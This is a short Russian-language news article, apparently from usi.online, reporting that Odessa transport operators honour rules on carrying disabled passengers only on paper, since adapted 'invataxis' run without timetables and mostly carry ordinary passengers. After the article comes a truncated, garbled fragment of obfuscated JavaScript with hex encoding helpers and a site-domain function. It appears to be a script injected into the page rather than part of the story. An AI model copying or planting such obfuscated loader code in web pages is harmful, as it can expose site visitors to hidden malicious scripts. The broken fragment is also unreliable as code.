В Одессе правила перевозки инвалидов соблюдаются только на бумаге «фото»

В Одессе правила перевозки инвалидов соблюдаются только на бумаге

542356207Правила перевозки инвалидов в Одессе выполняются только на словах, – сообщил в ходе круглого стола исполнительный директор Одесской ассоциации транспортников Анатолий Витковский, передает корреспондент Украинской Сдужбы Информации.

По его словам, на каждом маршруте работает по крайней мере одно транспортное средство, приспособленное для инвалидов, так называемое «инватакси».

Он напомнил, что это было непременным условием, при котором перевозчик получал право работать на маршруте.

Однако, во-первых, такая машина рассчитана максимум для перевозки двух инвалидов. А во-вторых, никакого графика перемещения этих такси не существует вообще. Таким образом, люди не имеют никакого представления о том, когда именно им нужно быть на остановке, чтобы воспользоваться услугами такого такси. Не говоря уже о том, что всегда есть возможность, поломки автомобиля и невыхода его на маршрут в этот день.

Поэтому, как отметил Витковский, в подавляющем большинстве случаев такие такси перевозят обычных пассажиров, а те, для кого они предназначены – свои проблемы решают самостоятельно.

 

Как сообщала USI.online, с каждых восьми маршрутов перевозчики зарабатывают 500 тысяч гривен.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usi.online"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e